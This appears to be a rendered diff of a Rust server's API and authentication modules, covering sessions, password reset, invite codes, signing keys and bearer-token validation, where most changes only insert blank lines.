pub struct AccountCodes {
103
pub account: String,
104
pub codes: Vec<String>,
105
}
106
+
107
pub async fn create_invite_codes(
108
State(state): State<AppState>,
109
BearerAuth(auth_user): BearerAuth,
···
179
}
180
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
181
}
182
+
183
#[derive(Deserialize)]
184
#[serde(rename_all = "camelCase")]
185
pub struct GetAccountInviteCodesParams {
186
pub include_used: Option<bool>,
187
pub create_available: Option<bool>,
188
}
189
+
190
#[derive(Serialize)]
191
#[serde(rename_all = "camelCase")]
192
pub struct InviteCode {
···
198
pub created_at: String,
199
pub uses: Vec<InviteCodeUse>,
200
}
201
+
202
#[derive(Serialize)]
203
#[serde(rename_all = "camelCase")]
204
pub struct InviteCodeUse {
205
pub used_by: String,
206
pub used_at: String,
207
}
208
+
209
#[derive(Serialize)]
210
pub struct GetAccountInviteCodesOutput {
211
pub codes: Vec<InviteCode>,
212
}
213
+
214
pub async fn get_account_invite_codes(
215
State(state): State<AppState>,
216
BearerAuth(auth_user): BearerAuth,
+1
src/api/server/mod.rs
+1
src/api/server/mod.rs
+5
src/api/server/password.rs
+5
src/api/server/password.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
fn generate_reset_code() -> String {
14
crate::util::generate_token_code()
15
}
···
28
}
29
"unknown".to_string()
30
}
31
#[derive(Deserialize)]
32
pub struct RequestPasswordResetInput {
33
pub email: String,
34
}
35
pub async fn request_password_reset(
36
State(state): State<AppState>,
37
headers: HeaderMap,
···
102
info!("Password reset requested for user {}", user_id);
103
(StatusCode::OK, Json(json!({}))).into_response()
104
}
105
#[derive(Deserialize)]
106
pub struct ResetPasswordInput {
107
pub token: String,
108
pub password: String,
109
}
110
pub async fn reset_password(
111
State(state): State<AppState>,
112
headers: HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
+
14
fn generate_reset_code() -> String {
15
crate::util::generate_token_code()
16
}
···
29
}
30
"unknown".to_string()
31
}
32
+
33
#[derive(Deserialize)]
34
pub struct RequestPasswordResetInput {
35
pub email: String,
36
}
37
+
38
pub async fn request_password_reset(
39
State(state): State<AppState>,
40
headers: HeaderMap,
···
105
info!("Password reset requested for user {}", user_id);
106
(StatusCode::OK, Json(json!({}))).into_response()
107
}
108
+
109
#[derive(Deserialize)]
110
pub struct ResetPasswordInput {
111
pub token: String,
112
pub password: String,
113
}
114
+
115
pub async fn reset_password(
116
State(state): State<AppState>,
117
headers: HeaderMap,
+3
src/api/server/service_auth.rs
+3
src/api/server/service_auth.rs
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::json;
11
use tracing::error;
12
#[derive(Deserialize)]
13
pub struct GetServiceAuthParams {
14
pub aud: String,
15
pub lxm: Option<String>,
16
pub exp: Option<i64>,
17
}
18
#[derive(Serialize)]
19
pub struct GetServiceAuthOutput {
20
pub token: String,
21
}
22
pub async fn get_service_auth(
23
State(state): State<AppState>,
24
headers: axum::http::HeaderMap,
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::json;
11
use tracing::error;
12
+
13
#[derive(Deserialize)]
14
pub struct GetServiceAuthParams {
15
pub aud: String,
16
pub lxm: Option<String>,
17
pub exp: Option<i64>,
18
}
19
+
20
#[derive(Serialize)]
21
pub struct GetServiceAuthOutput {
22
pub token: String,
23
}
24
+
25
pub async fn get_service_auth(
26
State(state): State<AppState>,
27
headers: axum::http::HeaderMap,
+12
src/api/server/session.rs
+12
src/api/server/session.rs
···
12
use serde::{Deserialize, Serialize};
13
use serde_json::json;
14
use tracing::{error, info, warn};
15
fn extract_client_ip(headers: &HeaderMap) -> String {
16
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
if let Ok(value) = forwarded.to_str() {
···
27
}
28
"unknown".to_string()
29
}
30
#[derive(Deserialize)]
31
pub struct CreateSessionInput {
32
pub identifier: String,
33
pub password: String,
34
}
35
#[derive(Serialize)]
36
#[serde(rename_all = "camelCase")]
37
pub struct CreateSessionOutput {
···
40
pub handle: String,
41
pub did: String,
42
}
43
pub async fn create_session(
44
State(state): State<AppState>,
45
headers: HeaderMap,
···
155
did: row.did,
156
}).into_response()
157
}
158
pub async fn get_session(
159
State(state): State<AppState>,
160
BearerAuth(auth_user): BearerAuth,
···
194
}
195
}
196
}
197
pub async fn delete_session(
198
State(state): State<AppState>,
199
headers: axum::http::HeaderMap,
···
227
}
228
}
229
}
230
pub async fn refresh_session(
231
State(state): State<AppState>,
232
headers: axum::http::HeaderMap,
···
395
}
396
}
397
}
398
#[derive(Deserialize)]
399
#[serde(rename_all = "camelCase")]
400
pub struct ConfirmSignupInput {
401
pub did: String,
402
pub verification_code: String,
403
}
404
#[derive(Serialize)]
405
#[serde(rename_all = "camelCase")]
406
pub struct ConfirmSignupOutput {
···
413
pub preferred_channel: String,
414
pub preferred_channel_verified: bool,
415
}
416
pub async fn confirm_signup(
417
State(state): State<AppState>,
418
Json(input): Json<ConfirmSignupInput>,
···
535
preferred_channel_verified: true,
536
}).into_response()
537
}
538
#[derive(Deserialize)]
539
#[serde(rename_all = "camelCase")]
540
pub struct ResendVerificationInput {
541
pub did: String,
542
}
543
pub async fn resend_verification(
544
State(state): State<AppState>,
545
Json(input): Json<ResendVerificationInput>,
···
12
use serde::{Deserialize, Serialize};
13
use serde_json::json;
14
use tracing::{error, info, warn};
15
+
16
fn extract_client_ip(headers: &HeaderMap) -> String {
17
if let Some(forwarded) = headers.get("x-forwarded-for") {
18
if let Ok(value) = forwarded.to_str() {
···
28
}
29
"unknown".to_string()
30
}
31
+
32
#[derive(Deserialize)]
33
pub struct CreateSessionInput {
34
pub identifier: String,
35
pub password: String,
36
}
37
+
38
#[derive(Serialize)]
39
#[serde(rename_all = "camelCase")]
40
pub struct CreateSessionOutput {
···
43
pub handle: String,
44
pub did: String,
45
}
46
+
47
pub async fn create_session(
48
State(state): State<AppState>,
49
headers: HeaderMap,
···
159
did: row.did,
160
}).into_response()
161
}
162
+
163
pub async fn get_session(
164
State(state): State<AppState>,
165
BearerAuth(auth_user): BearerAuth,
···
199
}
200
}
201
}
202
+
203
pub async fn delete_session(
204
State(state): State<AppState>,
205
headers: axum::http::HeaderMap,
···
233
}
234
}
235
}
236
+
237
pub async fn refresh_session(
238
State(state): State<AppState>,
239
headers: axum::http::HeaderMap,
···
402
}
403
}
404
}
405
+
406
#[derive(Deserialize)]
407
#[serde(rename_all = "camelCase")]
408
pub struct ConfirmSignupInput {
409
pub did: String,
410
pub verification_code: String,
411
}
412
+
413
#[derive(Serialize)]
414
#[serde(rename_all = "camelCase")]
415
pub struct ConfirmSignupOutput {
···
422
pub preferred_channel: String,
423
pub preferred_channel_verified: bool,
424
}
425
+
426
pub async fn confirm_signup(
427
State(state): State<AppState>,
428
Json(input): Json<ConfirmSignupInput>,
···
545
preferred_channel_verified: true,
546
}).into_response()
547
}
548
+
549
#[derive(Deserialize)]
550
#[serde(rename_all = "camelCase")]
551
pub struct ResendVerificationInput {
552
pub did: String,
553
}
554
+
555
pub async fn resend_verification(
556
State(state): State<AppState>,
557
Json(input): Json<ResendVerificationInput>,
+5
src/api/server/signing_key.rs
+5
src/api/server/signing_key.rs
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::{error, info};
13
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
14
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
15
let verifying_key = signing_key.verifying_key();
16
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
20
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
21
format!("did:key:{}", encoded)
22
}
23
#[derive(Deserialize)]
24
pub struct ReserveSigningKeyInput {
25
pub did: Option<String>,
26
}
27
#[derive(Serialize)]
28
#[serde(rename_all = "camelCase")]
29
pub struct ReserveSigningKeyOutput {
30
pub signing_key: String,
31
}
32
pub async fn reserve_signing_key(
33
State(state): State<AppState>,
34
Json(input): Json<ReserveSigningKeyInput>,
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::{error, info};
13
+
14
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
15
+
16
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
17
let verifying_key = signing_key.verifying_key();
18
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
22
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
23
format!("did:key:{}", encoded)
24
}
25
+
26
#[derive(Deserialize)]
27
pub struct ReserveSigningKeyInput {
28
pub did: Option<String>,
29
}
30
+
31
#[derive(Serialize)]
32
#[serde(rename_all = "camelCase")]
33
pub struct ReserveSigningKeyOutput {
34
pub signing_key: String,
35
}
36
+
37
pub async fn reserve_signing_key(
38
State(state): State<AppState>,
39
Json(input): Json<ReserveSigningKeyInput>,
+2
src/api/temp.rs
+2
src/api/temp.rs
···
8
use serde_json::json;
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
use crate::state::AppState;
11
#[derive(Serialize)]
12
#[serde(rename_all = "camelCase")]
13
pub struct CheckSignupQueueOutput {
···
17
#[serde(skip_serializing_if = "Option::is_none")]
18
pub estimated_time_ms: Option<i64>,
19
}
20
pub async fn check_signup_queue(
21
State(state): State<AppState>,
22
headers: HeaderMap,
···
8
use serde_json::json;
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
use crate::state::AppState;
11
+
12
#[derive(Serialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct CheckSignupQueueOutput {
···
18
#[serde(skip_serializing_if = "Option::is_none")]
19
pub estimated_time_ms: Option<i64>,
20
}
21
+
22
pub async fn check_signup_queue(
23
State(state): State<AppState>,
24
headers: HeaderMap,
+2
src/api/validation.rs
+2
src/api/validation.rs
···
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
pub fn is_valid_email(email: &str) -> bool {
7
let email = email.trim();
8
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
49
}
50
true
51
}
52
#[cfg(test)]
53
mod tests {
54
use super::*;
···
3
pub const MAX_DOMAIN_LENGTH: usize = 253;
4
pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63;
5
const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-";
6
+
7
pub fn is_valid_email(email: &str) -> bool {
8
let email = email.trim();
9
if email.is_empty() || email.len() > MAX_EMAIL_LENGTH {
···
50
}
51
true
52
}
53
+
54
#[cfg(test)]
55
mod tests {
56
use super::*;
+27
src/auth/extractor.rs
+27
src/auth/extractor.rs
···
5
Json,
6
};
7
use serde_json::json;
8
use crate::state::AppState;
9
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
10
pub struct BearerAuth(pub AuthenticatedUser);
11
#[derive(Debug)]
12
pub enum AuthError {
13
MissingToken,
···
16
AccountDeactivated,
17
AccountTakedown,
18
}
19
impl IntoResponse for AuthError {
20
fn into_response(self) -> Response {
21
let (status, error, message) = match self {
···
45
"Account has been taken down",
46
),
47
};
48
(status, Json(json!({ "error": error, "message": message }))).into_response()
49
}
50
}
51
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
52
let auth_header = auth_header.trim();
53
if auth_header.len() < 8 {
54
return Err(AuthError::InvalidFormat);
55
}
56
let prefix = &auth_header[..7];
57
if !prefix.eq_ignore_ascii_case("bearer ") {
58
return Err(AuthError::InvalidFormat);
59
}
60
let token = auth_header[7..].trim();
61
if token.is_empty() {
62
return Err(AuthError::InvalidFormat);
63
}
64
Ok(token)
65
}
66
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
67
let header = auth_header?;
68
let header = header.trim();
69
if header.len() < 7 {
70
return None;
71
}
72
if !header[..7].eq_ignore_ascii_case("bearer ") {
73
return None;
74
}
75
let token = header[7..].trim();
76
if token.is_empty() {
77
return None;
78
}
79
Some(token.to_string())
80
}
81
impl FromRequestParts<AppState> for BearerAuth {
82
type Rejection = AuthError;
83
async fn from_request_parts(
84
parts: &mut Parts,
85
state: &AppState,
···
90
.ok_or(AuthError::MissingToken)?
91
.to_str()
92
.map_err(|_| AuthError::InvalidFormat)?;
93
let token = extract_bearer_token(auth_header)?;
94
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
95
Ok(user) => Ok(BearerAuth(user)),
96
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
99
}
100
}
101
}
102
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
103
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
104
type Rejection = AuthError;
105
async fn from_request_parts(
106
parts: &mut Parts,
107
state: &AppState,
···
112
.ok_or(AuthError::MissingToken)?
113
.to_str()
114
.map_err(|_| AuthError::InvalidFormat)?;
115
let token = extract_bearer_token(auth_header)?;
116
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
117
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
118
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
120
}
121
}
122
}
123
#[cfg(test)]
124
mod tests {
125
use super::*;
126
#[test]
127
fn test_extract_bearer_token() {
128
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
130
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
131
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
132
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
133
assert!(extract_bearer_token("Basic abc123").is_err());
134
assert!(extract_bearer_token("Bearer").is_err());
135
assert!(extract_bearer_token("Bearer ").is_err());
···
5
Json,
6
};
7
use serde_json::json;
8
+
9
use crate::state::AppState;
10
use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated};
11
+
12
pub struct BearerAuth(pub AuthenticatedUser);
13
+
14
#[derive(Debug)]
15
pub enum AuthError {
16
MissingToken,
···
19
AccountDeactivated,
20
AccountTakedown,
21
}
22
+
23
impl IntoResponse for AuthError {
24
fn into_response(self) -> Response {
25
let (status, error, message) = match self {
···
49
"Account has been taken down",
50
),
51
};
52
+
53
(status, Json(json!({ "error": error, "message": message }))).into_response()
54
}
55
}
56
+
57
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
58
let auth_header = auth_header.trim();
59
+
60
if auth_header.len() < 8 {
61
return Err(AuthError::InvalidFormat);
62
}
63
+
64
let prefix = &auth_header[..7];
65
if !prefix.eq_ignore_ascii_case("bearer ") {
66
return Err(AuthError::InvalidFormat);
67
}
68
+
69
let token = auth_header[7..].trim();
70
if token.is_empty() {
71
return Err(AuthError::InvalidFormat);
72
}
73
+
74
Ok(token)
75
}
76
+
77
pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> {
78
let header = auth_header?;
79
let header = header.trim();
80
+
81
if header.len() < 7 {
82
return None;
83
}
84
+
85
if !header[..7].eq_ignore_ascii_case("bearer ") {
86
return None;
87
}
88
+
89
let token = header[7..].trim();
90
if token.is_empty() {
91
return None;
92
}
93
+
94
Some(token.to_string())
95
}
96
+
97
impl FromRequestParts<AppState> for BearerAuth {
98
type Rejection = AuthError;
99
+
100
async fn from_request_parts(
101
parts: &mut Parts,
102
state: &AppState,
···
107
.ok_or(AuthError::MissingToken)?
108
.to_str()
109
.map_err(|_| AuthError::InvalidFormat)?;
110
+
111
let token = extract_bearer_token(auth_header)?;
112
+
113
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
114
Ok(user) => Ok(BearerAuth(user)),
115
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
···
118
}
119
}
120
}
121
+
122
pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser);
123
+
124
impl FromRequestParts<AppState> for BearerAuthAllowDeactivated {
125
type Rejection = AuthError;
126
+
127
async fn from_request_parts(
128
parts: &mut Parts,
129
state: &AppState,
···
134
.ok_or(AuthError::MissingToken)?
135
.to_str()
136
.map_err(|_| AuthError::InvalidFormat)?;
137
+
138
let token = extract_bearer_token(auth_header)?;
139
+
140
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
141
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
142
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
···
144
}
145
}
146
}
147
+
148
#[cfg(test)]
149
mod tests {
150
use super::*;
151
+
152
#[test]
153
fn test_extract_bearer_token() {
154
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
···
156
assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123");
157
assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123");
158
assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123");
159
+
160
assert!(extract_bearer_token("Basic abc123").is_err());
161
assert!(extract_bearer_token("Bearer").is_err());
162
assert!(extract_bearer_token("Bearer ").is_err());
+35
-1
src/auth/mod.rs
+35
-1
src/auth/mod.rs
···
3
use std::fmt;
4
use std::sync::Arc;
5
use std::time::Duration;
6
use crate::cache::Cache;
7
pub mod extractor;
8
pub mod token;
9
pub mod verify;
10
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
11
pub use token::{
12
create_access_token, create_refresh_token, create_service_token,
···
16
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
17
};
18
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
19
const KEY_CACHE_TTL_SECS: u64 = 300;
20
const SESSION_CACHE_TTL_SECS: u64 = 60;
21
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
22
pub enum TokenValidationError {
23
AccountDeactivated,
···
25
KeyDecryptionFailed,
26
AuthenticationFailed,
27
}
28
impl fmt::Display for TokenValidationError {
29
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
30
match self {
···
35
}
36
}
37
}
38
pub struct AuthenticatedUser {
39
pub did: String,
40
pub key_bytes: Option<Vec<u8>>,
41
pub is_oauth: bool,
42
}
43
pub async fn validate_bearer_token(
44
db: &PgPool,
45
token: &str,
46
) -> Result<AuthenticatedUser, TokenValidationError> {
47
validate_bearer_token_with_options_internal(db, None, token, false).await
48
}
49
pub async fn validate_bearer_token_allow_deactivated(
50
db: &PgPool,
51
token: &str,
52
) -> Result<AuthenticatedUser, TokenValidationError> {
53
validate_bearer_token_with_options_internal(db, None, token, true).await
54
}
55
pub async fn validate_bearer_token_cached(
56
db: &PgPool,
57
cache: &Arc<dyn Cache>,
···
59
) -> Result<AuthenticatedUser, TokenValidationError> {
60
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
61
}
62
pub async fn validate_bearer_token_cached_allow_deactivated(
63
db: &PgPool,
64
cache: &Arc<dyn Cache>,
···
66
) -> Result<AuthenticatedUser, TokenValidationError> {
67
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
68
}
69
async fn validate_bearer_token_with_options_internal(
70
db: &PgPool,
71
cache: Option<&Arc<dyn Cache>>,
···
73
allow_deactivated: bool,
74
) -> Result<AuthenticatedUser, TokenValidationError> {
75
let did_from_token = get_did_from_token(token).ok();
76
if let Some(ref did) = did_from_token {
77
let key_cache_key = format!("auth:key:{}", did);
78
let mut cached_key: Option<Vec<u8>> = None;
79
if let Some(c) = cache {
80
cached_key = c.get_bytes(&key_cache_key).await;
81
if cached_key.is_some() {
···
84
crate::metrics::record_auth_cache_miss("key");
85
}
86
}
87
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
88
let user_status = sqlx::query!(
89
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
93
.await
94
.ok()
95
.flatten();
96
match user_status {
97
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
98
None => (None, None, None),
···
112
{
113
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
114
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
115
if let Some(c) = cache {
116
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
117
}
118
(Some(key), user.deactivated_at, user.takedown_ref)
119
} else {
120
(None, None, None)
121
}
122
};
123
if let Some(decrypted_key) = decrypted_key {
124
if !allow_deactivated && deactivated_at.is_some() {
125
return Err(TokenValidationError::AccountDeactivated);
126
}
127
if takedown_ref.is_some() {
128
return Err(TokenValidationError::AccountTakedown);
129
}
130
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
131
let jti = &token_data.claims.jti;
132
let session_cache_key = format!("auth:session:{}:{}", did, jti);
133
let mut session_valid = false;
134
if let Some(c) = cache {
135
if let Some(cached_value) = c.get(&session_cache_key).await {
136
session_valid = cached_value == "1";
···
139
crate::metrics::record_auth_cache_miss("session");
140
}
141
}
142
if !session_valid {
143
let session_exists = sqlx::query_scalar!(
144
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
149
.await
150
.ok()
151
.flatten();
152
session_valid = session_exists.is_some();
153
if session_valid {
154
if let Some(c) = cache {
155
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
156
}
157
}
158
}
159
if session_valid {
160
return Ok(AuthenticatedUser {
161
did: did.clone(),
···
166
}
167
}
168
}
169
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
170
if let Some(oauth_token) = sqlx::query!(
171
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
182
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
183
return Err(TokenValidationError::AccountDeactivated);
184
}
185
if oauth_token.takedown_ref.is_some() {
186
return Err(TokenValidationError::AccountTakedown);
187
}
188
let now = chrono::Utc::now();
189
if oauth_token.expires_at > now {
190
return Ok(AuthenticatedUser {
···
195
}
196
}
197
}
198
Err(TokenValidationError::AuthenticationFailed)
199
}
200
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
201
let key_cache_key = format!("auth:key:{}", did);
202
let _ = cache.delete(&key_cache_key).await;
203
}
204
#[derive(Debug, Serialize, Deserialize)]
205
pub struct Claims {
206
pub iss: String,
···
214
pub lxm: Option<String>,
215
pub jti: String,
216
}
217
#[derive(Debug, Serialize, Deserialize)]
218
pub struct Header {
219
pub alg: String,
220
pub typ: String,
221
}
222
#[derive(Debug, Serialize, Deserialize)]
223
pub struct UnsafeClaims {
224
pub iss: String,
225
pub sub: Option<String>,
226
}
227
-
// fancy boy TokenData equivalent for compatibility/structure
228
pub struct TokenData<T> {
229
pub claims: T,
230
}
···
3
use std::fmt;
4
use std::sync::Arc;
5
use std::time::Duration;
6
+
7
use crate::cache::Cache;
8
+
9
pub mod extractor;
10
pub mod token;
11
pub mod verify;
12
+
13
pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header};
14
pub use token::{
15
create_access_token, create_refresh_token, create_service_token,
···
19
SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED,
20
};
21
pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token};
22
+
23
const KEY_CACHE_TTL_SECS: u64 = 300;
24
const SESSION_CACHE_TTL_SECS: u64 = 60;
25
+
26
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
27
pub enum TokenValidationError {
28
AccountDeactivated,
···
30
KeyDecryptionFailed,
31
AuthenticationFailed,
32
}
33
+
34
impl fmt::Display for TokenValidationError {
35
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
36
match self {
···
41
}
42
}
43
}
44
+
45
pub struct AuthenticatedUser {
46
pub did: String,
47
pub key_bytes: Option<Vec<u8>>,
48
pub is_oauth: bool,
49
}
50
+
51
pub async fn validate_bearer_token(
52
db: &PgPool,
53
token: &str,
54
) -> Result<AuthenticatedUser, TokenValidationError> {
55
validate_bearer_token_with_options_internal(db, None, token, false).await
56
}
57
+
58
pub async fn validate_bearer_token_allow_deactivated(
59
db: &PgPool,
60
token: &str,
61
) -> Result<AuthenticatedUser, TokenValidationError> {
62
validate_bearer_token_with_options_internal(db, None, token, true).await
63
}
64
+
65
pub async fn validate_bearer_token_cached(
66
db: &PgPool,
67
cache: &Arc<dyn Cache>,
···
69
) -> Result<AuthenticatedUser, TokenValidationError> {
70
validate_bearer_token_with_options_internal(db, Some(cache), token, false).await
71
}
72
+
73
pub async fn validate_bearer_token_cached_allow_deactivated(
74
db: &PgPool,
75
cache: &Arc<dyn Cache>,
···
77
) -> Result<AuthenticatedUser, TokenValidationError> {
78
validate_bearer_token_with_options_internal(db, Some(cache), token, true).await
79
}
80
+
81
async fn validate_bearer_token_with_options_internal(
82
db: &PgPool,
83
cache: Option<&Arc<dyn Cache>>,
···
85
allow_deactivated: bool,
86
) -> Result<AuthenticatedUser, TokenValidationError> {
87
let did_from_token = get_did_from_token(token).ok();
88
+
89
if let Some(ref did) = did_from_token {
90
let key_cache_key = format!("auth:key:{}", did);
91
let mut cached_key: Option<Vec<u8>> = None;
92
+
93
if let Some(c) = cache {
94
cached_key = c.get_bytes(&key_cache_key).await;
95
if cached_key.is_some() {
···
98
crate::metrics::record_auth_cache_miss("key");
99
}
100
}
101
+
102
let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key {
103
let user_status = sqlx::query!(
104
"SELECT deactivated_at, takedown_ref FROM users WHERE did = $1",
···
108
.await
109
.ok()
110
.flatten();
111
+
112
match user_status {
113
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref),
114
None => (None, None, None),
···
128
{
129
let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version)
130
.map_err(|_| TokenValidationError::KeyDecryptionFailed)?;
131
+
132
if let Some(c) = cache {
133
let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await;
134
}
135
+
136
(Some(key), user.deactivated_at, user.takedown_ref)
137
} else {
138
(None, None, None)
139
}
140
};
141
+
142
if let Some(decrypted_key) = decrypted_key {
143
if !allow_deactivated && deactivated_at.is_some() {
144
return Err(TokenValidationError::AccountDeactivated);
145
}
146
+
147
if takedown_ref.is_some() {
148
return Err(TokenValidationError::AccountTakedown);
149
}
150
+
151
if let Ok(token_data) = verify_access_token(token, &decrypted_key) {
152
let jti = &token_data.claims.jti;
153
let session_cache_key = format!("auth:session:{}:{}", did, jti);
154
let mut session_valid = false;
155
+
156
if let Some(c) = cache {
157
if let Some(cached_value) = c.get(&session_cache_key).await {
158
session_valid = cached_value == "1";
···
161
crate::metrics::record_auth_cache_miss("session");
162
}
163
}
164
+
165
if !session_valid {
166
let session_exists = sqlx::query_scalar!(
167
"SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()",
···
172
.await
173
.ok()
174
.flatten();
175
+
176
session_valid = session_exists.is_some();
177
+
178
if session_valid {
179
if let Some(c) = cache {
180
let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await;
181
}
182
}
183
}
184
+
185
if session_valid {
186
return Ok(AuthenticatedUser {
187
did: did.clone(),
···
192
}
193
}
194
}
195
+
196
if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) {
197
if let Some(oauth_token) = sqlx::query!(
198
r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref
···
209
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
210
return Err(TokenValidationError::AccountDeactivated);
211
}
212
+
213
if oauth_token.takedown_ref.is_some() {
214
return Err(TokenValidationError::AccountTakedown);
215
}
216
+
217
let now = chrono::Utc::now();
218
if oauth_token.expires_at > now {
219
return Ok(AuthenticatedUser {
···
224
}
225
}
226
}
227
+
228
Err(TokenValidationError::AuthenticationFailed)
229
}
230
+
231
pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) {
232
let key_cache_key = format!("auth:key:{}", did);
233
let _ = cache.delete(&key_cache_key).await;
234
}
235
+
236
#[derive(Debug, Serialize, Deserialize)]
237
pub struct Claims {
238
pub iss: String,
···
246
pub lxm: Option<String>,
247
pub jti: String,
248
}
249
+
250
#[derive(Debug, Serialize, Deserialize)]
251
pub struct Header {
252
pub alg: String,
253
pub typ: String,
254
}
255
+
256
#[derive(Debug, Serialize, Deserialize)]
257
pub struct UnsafeClaims {
258
pub iss: String,
259
pub sub: Option<String>,
260
}
261
+
262
pub struct TokenData<T> {
263
pub claims: T,
264
}
+42
src/auth/token.rs
+42
src/auth/token.rs
···
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
use sha2::Sha256;
9
use uuid;
10
type HmacSha256 = Hmac<Sha256>;
11
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
12
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
13
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
···
15
pub const SCOPE_REFRESH: &str = "com.atproto.refresh";
16
pub const SCOPE_APP_PASS: &str = "com.atproto.appPass";
17
pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged";
18
pub struct TokenWithMetadata {
19
pub token: String,
20
pub jti: String,
21
pub expires_at: DateTime<Utc>,
22
}
23
pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> {
24
